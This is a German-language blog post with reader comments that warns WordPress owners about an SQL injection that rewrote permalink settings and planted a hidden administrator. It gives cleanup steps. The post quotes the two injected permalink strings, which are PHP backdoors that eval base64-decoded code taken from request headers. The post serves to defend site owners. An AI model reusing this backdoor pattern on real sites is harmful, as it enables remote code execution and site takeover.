Viele Websites werden von einem aktuellen SQL-Angriff getroffen, bei dem Codes auf Ihre Website eingeschleust werden. Diese MySQL-Injektion beeinträchtigt Ihre Permalinks, indem sie diese unwirksam macht. Infolgedessen funktionieren die URLs Ihrer Blogbeiträge nicht mehr. Zahlreiche WordPress-Blogs wurden bei diesem Angriff ins Visier genommen. Dank Andy Soward, der uns darauf aufmerksam gemacht hat.
Einer der folgenden Codes wurde aufgrund dieses Angriffs zu Ihrer Permalink-Struktur hinzugefügt:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Diese Anführungszeichen wurden an alle Permalinks auf Ihrer Website angehängt und können nur geändert werden, wenn sie manuell entfernt werden.
Um dies zu beheben, gehen Sie zu:
Einstellungen > Permalinks und entfernen Sie den obigen Code und ersetzen Sie ihn durch Ihren Standardcode.
Als Nächstes müssen Sie zu Benutzer gehen. Sie werden sehen, dass es mehr als einen Administrator gibt. Sie werden deren Namen nicht sehen, aber Sie werden sehen, dass die Anzahl gestiegen ist. Was Sie also tun müssen, ist, alle Benutzer anzusehen und den letzten zu finden, der sich registriert hat. Bewegen Sie Ihre Maus über diesen Benutzer und holen Sie sich den Link. Ändern Sie den Code userid= , indem Sie zu dieser Zahl 1 addieren. Wenn der letzte Benutzer, den Sie sehen können, also Benutzer Nr. 2 war, addieren Sie 1 hinzu und machen Sie ihn zu 3. Sie sollten feststellen, dass der versteckte Admin einen seltsamen Code als Vornamen hat. Löschen Sie den Code und machen Sie ihn zu einem Abonnenten. Kehren Sie dann zurück und löschen Sie ihn.
Dies sollte das Problem beheben. Sie können ihn auch löschen, indem Sie einfach zu Ihrem PHPMyAdmin gehen. Dort sehen Sie den Benutzer.
Wir wollten diese Nachricht so schnell wie möglich verbreiten, damit unsere Benutzer informiert werden können. Bitte stellen Sie sicher, dass Ihr Blog nicht infiziert ist. Wir hoffen, dass WordPress bald eine neue Version herausbringt.
Außerdem, wenn Sie einige dieser Maßnahmen noch nicht implementiert haben, um Ihren WordPress Admin-Bereich zu sichern.
ahmed_alaaedin
Die Datenbank meiner Website wurde vor ein paar Tagen injiziert, wobei nach jeder Beitrags- oder Seiten-URL seltsame Zeichen und Wörter hinzugefügt wurden. Ich konnte nichts Seltsames in den Einstellungen finden: Permalinks oder im Benutzer-Menü. Was kann ich tun, um dieses Problem zu beheben, bitte? Meine Hosting-Firma hat auch ein Backup der infizierten Datenbank!
ein WordPress-Benutzer
Ich wurde zweimal davon getroffen.
Beim ersten Mal war es wassup Plugin SQL-Injection, diesmal bin ich mir nicht sicher. Mein Hosting-Provider hat mich blockiert.
Sobald sie mein Konto wiederherstellen, werde ich WordPress entfernen... Ich habe die Nase voll!
Redaktion
Vielleicht ist es nicht die Schuld von WordPress, vielleicht ist die Sicherheit Ihres Hostings einfach nicht gut genug...
Administrator
Joey
Was haben Sie damit herausgefunden? Ich wurde gerade mit demselben Problem konfrontiert. Alle meine WP-Seiten auf meinem Konto leiden unter demselben Problem.
lerrkin
Hallo.
Interessante URL https://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/, die von hier verlinkt ist, zeigt eine leere Seite an.
Code enthält diesen Kommentar: ‘‘.
Das ist ein Bug von WP Super Cache http://wordpress.org/support/topic/315446, und er scheint hier vorhanden zu sein… Bitte aktualisieren Sie WP Super Cache. Ich hoffe, diese Tipps werden bald gelesen
Redaktion
Wir wissen diesen Kommentar sehr zu schätzen, das Problem lag nicht bei WP Super Cache, wir glauben, es war das Plugin namens WP External Link. Wir haben WP-Super Cache zweimal deinstalliert und neu installiert, aber dann haben wir den Entwicklungsserver verglichen, auf dem alles gut funktionierte. Der Unterschied war dieses Plugin. Als wir dieses Plugin entfernt haben, funktionierte es. Sie können diesen Beitrag jetzt lesen.
Administrator
lerrkin
Vielleicht war das ein Konflikt zwischen WP External Link und Super Cache…
Der Text lautete „Page not cached by WP Super Cache. No closing HTML tag. Check your theme“.
Ich sehe, dass mein eingefügter WP-Super-Cache-HTML-Kommentar oben als HTML-Kommentar funktioniert und unsichtbar ist
Die letzte Super Cache-Version verspricht also, keine HTML-Gültigkeitsprüfung durchzuführen.
Oh, ich lese gerade!
Vielen Dank!
Roseli A. Bakar
Danke, dass Sie das hervorheben